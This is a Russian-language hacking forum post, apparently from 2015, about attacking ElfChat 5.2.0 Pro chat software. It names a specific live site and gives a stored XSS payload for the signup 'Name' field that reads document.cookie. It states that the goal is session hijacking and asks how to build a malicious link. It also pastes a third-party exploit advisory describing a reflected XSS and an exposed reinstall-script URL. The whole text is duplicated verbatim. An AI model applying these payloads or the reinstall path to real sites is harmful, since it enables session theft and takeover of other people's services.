abraman
02.10.2015, 23:47
http://yourspier.com/temp/ElfChat/signup.php
Уязвимость присутствует в скрипте для регистрации в поле "Name"
Code:
">alert("cookie: "+document.cookie);
(работает в firefox)
Задача перехват сессии, однако не совсем понятно каким образом можно сгенерировать вредоносную ссылку.
Также по теме имеется exploit
HTML:
ElfChat 5.2.0 Pro Reinstall SCript EXploits
===========================================
Author : indoushka
Vondor : http://elfchat.ru/
Dork: 2011 Elfet - ElfChat 5.2.0 Pro
==========================
XSS Reflected - Jquery 1.4.2
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
alert('xss
reflected - jquery 1.4.2 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com');
===
and :
/ElfChat/js/datepicker/js/jquery.js
/ElfChat/js/min/jquery.js
Reinstall SCript :
http://127.0.0.1/ElfChat/install/index.php?act=settings
Уязвимость присутствует в скрипте для регистрации в поле "Name"
Code:
">alert("cookie: "+document.cookie);
(работает в firefox)
Задача перехват сессии, однако не совсем понятно каким образом можно сгенерировать вредоносную ссылку.
Также по теме имеется exploit
HTML:
ElfChat 5.2.0 Pro Reinstall SCript EXploits
===========================================
Author : indoushka
Vondor : http://elfchat.ru/
Dork: 2011 Elfet - ElfChat 5.2.0 Pro
==========================
XSS Reflected - Jquery 1.4.2
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
alert('xss
reflected - jquery 1.4.2 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com');
===
and :
/ElfChat/js/datepicker/js/jquery.js
/ElfChat/js/min/jquery.js
Reinstall SCript :
http://127.0.0.1/ElfChat/install/index.php?act=settings